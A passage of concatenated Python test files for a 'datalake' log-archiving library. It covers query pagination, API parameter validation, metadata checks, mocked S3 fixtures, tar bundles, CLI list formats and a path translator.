# Only allow the last page to be empty
if page.cursor is not None:
assert page_len > 0
return page
def consolidate_pages(pages):
for p in pages[:-1]:
assert p.cursor is not None
return [record for page in pages for record in page]
def test_paginate_work_id_records(table_maker, querier, record_maker):
records = []
for i in range(150):
records += record_maker(what='foo', work_id='job0',
start=1456833600000,
end=1456837200000)
table_maker(records)
pages = get_all_pages(querier.query_by_work_id, ['job0', 'foo'])
assert len(pages) > 1
results = consolidate_pages(pages)
assert len(results) == 150
def evaluate_time_based_results(results, num_expected):
# we tolerate some duplication for time queries because there is no great
# way to deduplicate across pages.
assert len(results) >= num_expected
ids = set([r['metadata']['id'] for r in results])
assert len(ids) == num_expected
def test_paginate_time_records(table_maker, querier, record_maker):
records = []
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
very_end = YEAR_2010 + 150 * interval
for start in range(YEAR_2010, very_end, interval):
end = start + interval
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
pages = get_all_pages(querier.query_by_time, [YEAR_2010, very_end, 'foo'])
assert len(pages) > 1
results = consolidate_pages(pages)
evaluate_time_based_results(results, 150)
def test_paginate_many_records_single_time_bucket(table_maker, querier,
record_maker):
records = []
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS/150
very_end = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
for start in range(YEAR_2010, very_end, interval):
end = start + interval
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
pages = get_all_pages(querier.query_by_time, [YEAR_2010, very_end, 'foo'])
assert len(pages) > 1
results = consolidate_pages(pages)
evaluate_time_based_results(results, 150)
def test_paginate_few_records_single_bucket_no_empty_page(table_maker,
querier,
record_maker):
records = []
# Fill one bucket with 2x MAX_RESULTS,
# but we only want the last record.
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS / MAX_RESULTS / 2
very_end = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
for start in range(YEAR_2010, very_end, interval):
end = start + interval
records += record_maker(start=start, end=end, what='foo')
table_maker(records)
results = get_page(querier.query_by_time, [very_end - interval + 1,
very_end, 'foo'])
evaluate_time_based_results(results, 1)
def test_unaligned_multibucket_queries(table_maker, querier, record_maker):
records = []
# Create 5 records spanning 3 buckets, of which we want the middle 3
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*1/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*1/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*3/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*3/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*6/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*6/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*9/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*9/4+1, what='foo')
records += record_maker(
start=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*11/4,
end=YEAR_2010+DatalakeRecord.TIME_BUCKET_SIZE_IN_MS*11/4+1, what='foo')
table_maker(records)
start = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS * 3 / 4
end = YEAR_2010 + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS * 9 / 4
results = get_page(querier.query_by_time, [start, end, 'foo'])
evaluate_time_based_results(results, 3)
def test_null_end(table_maker, querier, record_maker):
m = {
"start": 1461023640000,
"what": "file",
"version": 0,
"end": None,
"work_id": None,
"path": "/home/foo/file",
"where": "somehost",
"id": "fedcba09876543210",
"hash": "0123456789abcdef"
}
records = record_maker(**m)
table_maker(records)
results = querier.query_by_time(1461023630000, 1461023650000, 'file')
assert len(results) == 1
def test_no_end(table_maker, querier, s3_file_from_metadata):
m = random_metadata()
del(m['end'])
url = 's3://datalake-test/' + m['id']
s3_file_from_metadata(url, m)
records = DatalakeRecord.list_from_metadata(url, m)
table_maker(records)
results = querier.query_by_time(m['start'], m['start'] + 1, m['what'])
assert len(results) == 1
assert results[0]['metadata']['end'] is None
def test_no_end_exclusion(table_maker, querier, s3_file_from_metadata):
m = random_metadata()
del(m['end'])
url = 's3://datalake-test/' + m['id']
s3_file_from_metadata(url, m)
records = DatalakeRecord.list_from_metadata(url, m)
table_maker(records)
results = querier.query_by_time(m['start'] + 1, m['start'] + 2, m['what'])
assert len(results) == 0
def _validate_latest_result(result, **kwargs):
assert result is not None
for k, v in kwargs.iteritems():
assert result['metadata'][k] == v
def test_latest_happened_today(table_maker, querier, record_maker):
now = int(time.time() * 1000)
records = record_maker(start=now, end=None, what='foo', where='boo')
table_maker(records)
result = querier.query_latest('foo', 'boo')
_validate_latest_result(result, what='foo', where='boo')
def test_no_latest(table_maker, querier):
table_maker([])
result = querier.query_latest('statue', 'newyork')
assert result is None
def test_latest_happened_yesterday(table_maker, querier, record_maker):
yesterday = int(time.time() * 1000) - _ONE_DAY_MS
records = record_maker(start=yesterday, end=None, what='tower',
where='pisa')
table_maker(records)
result = querier.query_latest('tower', 'pisa')
_validate_latest_result(result, what='tower', where='pisa')
def test_latest_many_records_single_time_bucket(table_maker, querier,
record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS/150
very_end = start + DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
last_start = very_end - interval
for t in range(start, very_end, interval):
end = t + interval
records += record_maker(start=t, end=end, what='meow', where='tree')
table_maker(records)
result = querier.query_latest('meow', 'tree')
_validate_latest_result(result, what='meow', where='tree',
start=last_start)
def test_latest_creation_time_breaks_tie(table_maker, querier,
record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
interval = DatalakeRecord.TIME_BUCKET_SIZE_IN_MS/150
end = start + interval
table = table_maker([])
for i in range(3):
record = record_maker(start=start,
end=end,
what='meow',
where='tree',
path='/{}'.format(i))
table.put_item(Item=record[0])
# unfortunately moto only keeps 1-sec resolution on create times.
time.sleep(1.01)
result = querier.query_latest('meow', 'tree')
_validate_latest_result(result, what='meow', where='tree',
start=start)
assert result['metadata']['path'] == '/2'
def test_max_results_in_one_bucket(table_maker, querier, record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
end = start
for i in range(MAX_RESULTS):
records += record_maker(start=start,
end=end,
what='boo',
where='hoo{}'.format(i))
table_maker(records)
pages = get_all_pages(querier.query_by_time, [start, end, 'boo'])
results = consolidate_pages(pages)
assert len(results) == MAX_RESULTS
def test_2x_max_results_in_one_bucket(table_maker, querier, record_maker):
now = int(time.time() * 1000)
records = []
bucket = now/DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
start = bucket * DatalakeRecord.TIME_BUCKET_SIZE_IN_MS
end = start
for i in range(MAX_RESULTS * 2):
records += record_maker(start=start,
end=end,
what='boo',
where='hoo{}'.format(i))
table_maker(records)
pages = get_all_pages(querier.query_by_time, [start, end, 'boo'])
results = consolidate_pages(pages)
assert len(results) == MAX_RESULTS * 2
```
#### File: api/tests/test_bad_queries.py
```python
import simplejson as json
import base64
def get_bad_request(client, params):
uri = '/v0/archive/files/'
q = '&'.join(['{}={}'.format(k, v) for k, v in params.iteritems()])
if q:
uri += '?' + q
res = client.get(uri)
assert res.status_code == 400
response = json.loads(res.get_data())
assert 'code' in response
assert 'message' in response
return response
def test_no_parameters(client):
res = get_bad_request(client, {})
assert res['code'] == 'NoArgs'
def test_no_what_parameter(client):
res = get_bad_request(client, {'start': 123})
assert res['code'] == 'NoWhat'
def test_no_work_id_or_interval(client):
res = get_bad_request(client, {'what': 'syslog'})
assert res['code'] == 'NoWorkInterval'
def test_work_id_and_start(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_work_id_and_end(client):
params = {
'what': 'syslog',
'work_id': 'work123',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_start_without_end(client):
params = {
'what': 'syslog',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_end_without_start(client):
params = {
'what': 'syslog',
'end': 345
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_start(client):
params = {
'what': 'syslog',
'start': 'notaninteger',
'end': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_invalid_end(client):
params = {
'what': 'syslog',
'end': 'notaninteger',
'start': 123
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidTime'
def test_start_after_end(client):
params = {
'what': 'syslog',
'end': 100,
'start': 200,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidWorkInterval'
def test_invalid_cursor(client):
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': 'foobar',
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
def test_bad_cursor_valid_json(client):
cursor = base64.b64encode('{"valid": "json", "invalid": "cursor"}')
params = {
'what': 'syslog',
'start': 100,
'end': 200,
'cursor': cursor,
}
res = get_bad_request(client, params)
assert res['code'] == 'InvalidCursor'
```
#### File: datalake/tests/test_metadata.py
```python
import pytest
from dateutil.parser import parse as dateparse
from datalake.common import Metadata, InvalidDatalakeMetadata, \
UnsupportedDatalakeMetadataVersion
def test_version_default(basic_metadata):
del(basic_metadata['version'])
m = Metadata(basic_metadata)
assert 'version' in m
assert m['version'] == 0
def test_unsupported_version(basic_metadata):
basic_metadata['version'] = '100'
with pytest.raises(UnsupportedDatalakeMetadataVersion):
Metadata(basic_metadata)
def test_normalize_date(basic_metadata):
basic_metadata['start'] = '2015-03-20'
m = Metadata(basic_metadata)
assert m['start'] == 1426809600000
def test_invalid_date(basic_metadata):
basic_metadata['end'] = 'bxfl230'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_id_gets_assigned(basic_metadata):
m = Metadata(basic_metadata)
assert 'id' in m
assert m['id'] is not None
def test_none_for_required_field(basic_metadata):
basic_metadata['where'] = None
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_work_id_gets_assigned(basic_metadata):
m = Metadata(basic_metadata)
assert 'work_id' in m
assert m['work_id'] is None
def test_id_not_overwritten(basic_metadata):
basic_metadata['id'] = '123'
m = Metadata(basic_metadata)
assert 'id' in m
assert m['id'] == '123'
def test_no_end_allowed(basic_metadata):
del(basic_metadata['end'])
m = Metadata(basic_metadata)
assert m['end'] is None
def test_unallowed_characters(basic_metadata):
basic_metadata['what'] = '123#$'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_unallowed_capitals(basic_metadata):
basic_metadata['what'] = 'MYFILE'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_unallowed_spaces(basic_metadata):
basic_metadata['where'] = 'SAN FRANCISCO'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_unallowed_dots(basic_metadata):
basic_metadata['where'] = 'this.that.com'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_work_id_null_string_unallowed(basic_metadata):
basic_metadata['work_id'] = 'null'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_work_id_with_unallowed_characters(basic_metadata):
basic_metadata['work_id'] = 'foojob#123'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
basic_json = ('{"start": 1426809600000, "what": "apache", "version": 0, '
'"end": 1426895999999, "hash": "12345", "where": "nebraska", '
'"id": "9f8f8b618f48424c8d69a7ed76c88f05", "work_id": null, '
'"path": "/var/log/apache/access.log.1"}')
def test_from_to_json(basic_metadata):
m1 = Metadata.from_json(basic_json)
m2 = m1.json
assert sorted(m2) == sorted(basic_json)
def test_from_invalid_json():
with pytest.raises(InvalidDatalakeMetadata):
Metadata.from_json('{flee floo')
def test_from_none_json():
with pytest.raises(InvalidDatalakeMetadata):
Metadata.from_json(None)
def test_end_before_start(basic_metadata):
end = basic_metadata['end']
basic_metadata['end'] = basic_metadata['start']
basic_metadata['start'] = end
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_random_metadata(random_metadata):
# Others rely on datalake-common's random_metadata to be valid. So make
# sure it doesn't throw any errors.
Metadata(random_metadata)
def test_normalize_float_date(basic_metadata):
basic_metadata['start'] = '1426809600.123'
m = Metadata(basic_metadata)
assert m['start'] == 1426809600123
def test_normalize_int_date(basic_metadata):
basic_metadata['end'] = '1426809600123'
m = Metadata(basic_metadata)
assert m['end'] == 1426809600123
def test_normalize_date_with_datetime(basic_metadata):
date = dateparse('2015-03-20T00:00:00Z')
ms = Metadata.normalize_date(date)
assert ms == 1426809600000
def test_normalize_garbage(basic_metadata):
with pytest.raises(InvalidDatalakeMetadata):
Metadata.normalize_date('bleeblaaablooo')
def test_path_with_leading_dot_not_allowed(basic_metadata):
basic_metadata['path'] = './abc.txt'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_relative_path_not_allowed(basic_metadata):
basic_metadata['path'] = 'abc.txt'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
def test_absolute_windows_path(basic_metadata):
path = r'Z:\\foo\bar.txt'
basic_metadata['path'] = path
m = Metadata(basic_metadata)
assert m['path'] == path
def test_absolute_windows_path_single_slash(basic_metadata):
# some cygwin environments seem to have a single slash after the
# drive. Shrug.
path = r'Z:\foo\bar.txt'
basic_metadata['path'] = path
m = Metadata(basic_metadata)
assert m['path'] == path
def test_relative_windows_path_not_allowed(basic_metadata):
basic_metadata['path'] = r'foo\abc.txt'
with pytest.raises(InvalidDatalakeMetadata):
Metadata(basic_metadata)
```
#### File: client/test/conftest.py
```python
import pytest
from moto import mock_s3
import boto
from six.moves.urllib.parse import urlparse
from datalake.tests import random_metadata, tmpfile # noqa
import os
from click.testing import CliRunner
import stat
import responses
import logging
from datalake.scripts.cli import cli
from datalake import Archive
logging.basicConfig(level=logging.INFO)
@pytest.fixture
def s3_conn(request):
mock = mock_s3()
mock.start()
conn = boto.connect_s3()
def tear_down():
mock.stop()
request.addfinalizer(tear_down)
return conn
BUCKET_NAME = 'datalake-test'
@pytest.fixture
def s3_bucket(s3_conn):
return s3_conn.create_bucket(BUCKET_NAME)
@pytest.fixture
def archive_maker(s3_bucket):
def maker(**kwargs):
kwargs.update(
storage_url='s3://' + s3_bucket.name + '/',
http_url='http://datalake.example.com'
)
return Archive(**kwargs)
return maker
@pytest.fixture
def archive(archive_maker):
return archive_maker()
@pytest.fixture
def s3_key(s3_conn, s3_bucket):
def get_s3_key(url=None):
if url is None:
# if no url is specified, assume there is just one key in the
# bucket. This is the common case for tests that only push one
# item.
keys = [k for k in s3_bucket.list()]
assert len(keys) == 1
return keys[0]
else:
url = urlparse(url)
assert url.scheme == 's3'
bucket = s3_conn.get_bucket(url.netloc)
return bucket.get_key(url.path)
return get_s3_key
@pytest.fixture
def cli_tester(s3_bucket):
def tester(command, expected_exit=0):
os.environ['DATALAKE_STORAGE_URL'] = 's3://' + s3_bucket.name
os.environ['DATALAKE_HTTP_URL'] = 'http://datalake.example.com'
parts = command.split(' ')
runner = CliRunner()
result = runner.invoke(cli, parts, catch_exceptions=False)
assert result.exit_code == expected_exit, result.output
return result.output
return tester
@pytest.fixture # noqa
def datalake_url_maker(archive, tmpfile, random_metadata):
def maker(metadata=random_metadata, content=b''):
f = tmpfile(content)
return archive.prepare_metadata_and_push(f, **metadata)
return maker
crtime = os.environ.get('CRTIME', '/usr/local/bin/crtime')
crtime_available = os.path.isfile(crtime) and os.access(crtime, os.X_OK)
crtime_setuid = False
if crtime_available:
s = os.stat(crtime)
crtime_setuid = s.st_mode & stat.S_ISUID and s.st_uid == 0
def prepare_response(response, status=200, url=None, **query_params):
url = url or 'http://datalake.example.com/v0/archive/files/'
if len(query_params):
q = ['{}={}'.format(k, query_params[k]) for k in query_params.keys()]
url = url + '?' + '&'.join(q)
responses.add(responses.GET, url, json=response, status=status,
match_querystring=True)
```
#### File: client/test/test_file.py
```python
import pytest
from datalake.tests import random_word, random_metadata
from datalake.common import InvalidDatalakeMetadata
import os
import json
import tarfile
from io import BytesIO
from datalake import File, InvalidDatalakeBundle
def random_file(tmpdir, metadata=None):
name = random_word(10)
content = random_word(256)
f = tmpdir.join(name)
f.write(content)
if metadata is None:
metadata = random_metadata()
return File.from_filename(f.strpath, **metadata)
@pytest.fixture
def random_files(tmpdir):
def get_randfiles(n):
return [random_file(tmpdir) for _ in range(n)]
return get_randfiles
def test_file_hash_different(random_files):
files = random_files(2)
assert files[0].metadata['hash'] != files[1].metadata['hash']
def test_non_existent_file():
with pytest.raises(IOError):
File.from_filename('surelythisfiledoesnotexist.txt')
def test_not_enough_metadata(tmpdir):
with pytest.raises(InvalidDatalakeMetadata):
random_file(tmpdir, metadata={'where': 'foo'})
def test_hash_not_overwritten(tmpdir, random_metadata):
random_metadata['hash'] = '1234'
f = random_file(tmpdir, metadata=random_metadata)
assert f.metadata['hash'] == random_metadata['hash']
def test_default_where(monkeypatch, tmpdir, random_metadata):
monkeypatch.setenv('DATALAKE_DEFAULT_WHERE', 'here')
del(random_metadata['where'])
f = random_file(tmpdir, metadata=random_metadata)
assert f.metadata['where'] == 'here'
def test_valid_bundle(tmpdir, random_metadata):
p = os.path.join(str(tmpdir), 'foo.tar')
f1 = random_file(tmpdir, metadata=random_metadata)
f1.to_bundle(p)
f2 = File.from_bundle(p)
assert f1.metadata == f2.metadata
content1 = f1.read()
content2 = f2.read()
assert content1
assert content1 == content2
def test_bundle_not_tar(tmpfile):
f = tmpfile('foobar')
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(f)
def add_string_to_tar(tfile, arcname, data):
if data is None:
return
s = BytesIO(data)
info = tarfile.TarInfo(name=arcname)
s.seek(0, os.SEEK_END)
info.size = s.tell()
s.seek(0, 0)
tfile.addfile(tarinfo=info, fileobj=s)
@pytest.fixture
def bundle_maker(tmpdir):
def maker(content=None, metadata=None, version=None):
f = random_word(10) + '.tar'
f = os.path.join(str(tmpdir), f)
t = tarfile.open(f, 'w')
add_string_to_tar(t, 'content', content)
add_string_to_tar(t, 'version', version)
add_string_to_tar(t, 'datalake-metadata.json', metadata)
t.close()
return f
return maker
def test_bundle_without_version(bundle_maker, random_metadata):
m = json.dumps(random_metadata).encode('utf-8')
b = bundle_maker(content='1234'.encode('utf-8'), metadata=m)
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_without_metadata(bundle_maker):
b = bundle_maker(content='1234'.encode('utf-8'),
version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_without_content(bundle_maker, random_metadata):
m = json.dumps(random_metadata).encode('utf-8')
b = bundle_maker(metadata=m, version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_with_non_json_metadata(bundle_maker):
b = bundle_maker(content='1234'.encode('utf-8'),
metadata='not:a%json#'.encode('utf-8'),
version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeBundle):
File.from_bundle(b)
def test_bundle_with_invalid_metadata(bundle_maker, random_metadata):
del(random_metadata['what'])
m = json.dumps(random_metadata).encode('utf-8')
b = bundle_maker(content='1234'.encode('utf-8'),
metadata=m,
version='0'.encode('utf-8'))
with pytest.raises(InvalidDatalakeMetadata):
File.from_bundle(b)
here = os.path.dirname(__file__)
legacy_bundles = os.path.join(here, 'legacy_bundles')
def test_pre_python_3_bundle():
# prior to python 3 support, we relied on python to choose the most
# suitable encoding for files. Now we do it explicitly. Make sure legacy
# bundles work.
eyedee = '7c72f3ab092445a08aa6983c864c087c'
expected_content = b'Wake up.\nEat. Mmm.\nHappy hour.\nSleep.\n'
expected_metadata = {
'end': 1474308636507,
'hash': '70373dec2de49d566fc1e34bacca7561',
'id': eyedee,
'path': '/home/brian/src/datalake/chicken.log',
'start': 1474308548000,
'version': 0,
'what': 'chicken',
'where': 'nomad',
'work_id': None
}
b = os.path.join(legacy_bundles, eyedee + '.tar')
f = File.from_bundle(b)
assert f.metadata == expected_metadata
assert f.read() == expected_content
```
#### File: client/test/test_list.py
```python
import pytest
import responses
from datalake import DatalakeHttpError
from copy import copy
from datalake.common import Metadata
from datetime import datetime, timedelta
from pytz import utc
import simplejson as json
from conftest import prepare_response
import requests
@responses.activate
def test_list_one_page(archive, random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
l = list(archive.list(random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_list_two_pages(archive, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
r1 = {
'records': [
{
'url': 's3://bucket/file1',
'metadata': m1,
}
],
'next': 'http://the-next-url/',
}
prepare_response(r1, what=random_metadata['what'], start=m1['start'],
end=m1['end'])
m2 = copy(random_metadata)
m2['id'] = '2'
r2 = {
'records': [
{
'url': 's3://bucket/file2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r2, url='http://the-next-url/')
l = list(archive.list(m1['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(l) == 2
assert l[0]['url'] == 's3://bucket/file1'
assert l[0]['metadata'] == m1
assert l[1]['url'] == 's3://bucket/file2'
assert l[1]['metadata'] == m2
@responses.activate
def test_bad_request(archive):
r = {
"code": "NoWorkInterval",
"message": "You must provide either work_id or start/end"
}
prepare_response(r, status=400, what='syslog')
with pytest.raises(DatalakeHttpError):
list(archive.list('syslog'))
@responses.activate
def test_internal_server_error(archive):
r = 'INTERNAL SERVER ERROR'
prepare_response(r, status=500, what='syslog')
with pytest.raises(DatalakeHttpError):
list(archive.list('syslog'))
@pytest.fixture
def date_tester(archive, random_metadata):
def tester(start, end):
random_metadata['start'] = Metadata.normalize_date(start)
random_metadata['end'] = Metadata.normalize_date(end)
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
l = list(archive.list(random_metadata['what'], start=start, end=end))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
return tester
@responses.activate
def test_datetime_date(date_tester):
start = datetime.now(utc) - timedelta(days=1)
end = datetime.now(utc)
date_tester(start, end)
@responses.activate
def test_human_readable_date(date_tester):
start = '1977-01-01'
end = '1977-01-02'
date_tester(start, end)
@responses.activate
def test_with_where(archive, random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
where=random_metadata['where'],
start=random_metadata['start'],
end=random_metadata['end'])
l = list(archive.list(random_metadata['what'],
where=random_metadata['where'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_with_work_id(archive, random_metadata):
random_metadata['work_id'] = 'foo123'
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
work_id=random_metadata['work_id'])
l = list(archive.list(random_metadata['what'],
work_id='foo123'))
assert len(l) == 1
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_list_cli_url_format(cli_tester, random_metadata):
r = {
'records': [
{
'url': 's3://thisistheurl',
'metadata': random_metadata,
},
{
'url': 's3://thisistheotherurl',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
cmd = 'list {what} --start={start} --end={end}'
cmd = cmd.format(**random_metadata)
output = cli_tester(cmd)
assert output == 's3://thisistheurl\ns3://thisistheotherurl\n'
@responses.activate
def test_list_cli_json_format(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
r = {
'records': [
{
'url': 's3://url1',
'metadata': m1,
},
{
'url': 's3://url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=json'
cmd = cmd.format(**m1)
output_lines = cli_tester(cmd).rstrip('\n').split('\n')
assert len(output_lines) == 2
output_jsons = [json.loads(l) for l in output_lines]
for record in r['records']:
assert record in output_jsons
@responses.activate
def test_list_cli_http_format(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
r = {
'records': [
{
'url': 's3://url1',
'http_url': 'https://foo.com/url1',
'metadata': m1,
},
{
'url': 's3://url2',
'http_url': 'https://foo.com/url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=http'
cmd = cmd.format(**m1)
output = cli_tester(cmd).rstrip('\n').split('\n')
assert output == ['https://foo.com/url1', 'https://foo.com/url2']
@responses.activate
def test_list_cli_human_format(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m1['start'] = 1612548642000
m1['end'] = 1612548643000
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
m2['start'] = 1612548642000
m2['end'] = 1612548643000
r = {
'records': [
{
'url': 's3://url1',
'metadata': m1,
},
{
'url': 's3://url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=human'
cmd = cmd.format(**m1)
stanzas = [s for s in cli_tester(cmd).split('\n\n') if s]
for s in stanzas:
lines = [l for l in s.split('\n')]
# just check for the start/end
assert 'start: 2021-02-05T18:10:42+00:00' in lines
assert 'end: 2021-02-05T18:10:43+00:00' in lines
print(stanzas)
assert len(stanzas) == 2
@responses.activate
def test_list_cli_human_format_no_end_time(cli_tester, random_metadata):
m1 = copy(random_metadata)
m1['id'] = '1'
m1['work_id'] = 'foo1234'
m1['start'] = 1612548642000
m1['end'] = None
m2 = copy(random_metadata)
m2['id'] = '2'
m2['work_id'] = 'foo1234'
m2['start'] = 1612548642000
m2['end'] = None
r = {
'records': [
{
'url': 's3://url1',
'metadata': m1,
},
{
'url': 's3://url2',
'metadata': m2,
}
],
'next': None,
}
prepare_response(r, what=m1['what'], work_id=m1['work_id'])
cmd = 'list {what} --work-id={work_id} --format=human'
cmd = cmd.format(**m1)
stanzas = [s for s in cli_tester(cmd).split('\n\n') if s]
for s in stanzas:
lines = [l for l in s.split('\n')]
# just check for the start/end
assert 'start: 2021-02-05T18:10:42+00:00' in lines
assert 'end: null' in lines
assert len(stanzas) == 2
TEST_REQUESTS = []
class SessionWrapper(requests.Session):
def __init__(self, *args, **kwargs):
global TEST_REQUESTS
TEST_REQUESTS = []
return super(SessionWrapper, self).__init__(*args, **kwargs)
def request(self, method, url, **kwargs):
global TEST_REQUESTS
TEST_REQUESTS.append((method, url))
return super(SessionWrapper, self).request(method, url, **kwargs)
@responses.activate
def test_list_with_injected_session(archive_maker, random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
s = SessionWrapper()
a = archive_maker(session=s)
l = list(a.list(random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(TEST_REQUESTS) > 0
assert len(l) > 0
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
@responses.activate
def test_list_with_session_class(monkeypatch,
archive_maker,
random_metadata):
r = {
'records': [
{
'url': 's3://bucket/file',
'metadata': random_metadata,
}
],
'next': None,
}
prepare_response(r, what=random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end'])
monkeypatch.setenv('DATALAKE_SESSION_CLASS', 'test_list.SessionWrapper')
a = archive_maker()
l = list(a.list(random_metadata['what'],
start=random_metadata['start'],
end=random_metadata['end']))
assert len(TEST_REQUESTS) > 0
assert len(l) > 0
assert l[0]['url'] == 's3://bucket/file'
assert l[0]['metadata'] == random_metadata
```
#### File: client/test/test_translator.py
```python
import pytest
from datalake import Translator, TranslatorError
def test_valid():
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}')
s = t.translate('/var/log/jobs/job-1234.log')
assert s == 'job1234'
def test_extract_from_path():
t = Translator('.*/(?P<server_name>.*)/job-[0-9]+.log$~{server_name}')
s = t.translate('/var/log/jobs/myserver/job-1234.log')
assert s == 'myserver'
def test_missing_tilde():
with pytest.raises(TranslatorError):
Translator('no-tilde-here')
def test_too_many_tildes():
with pytest.raises(TranslatorError):
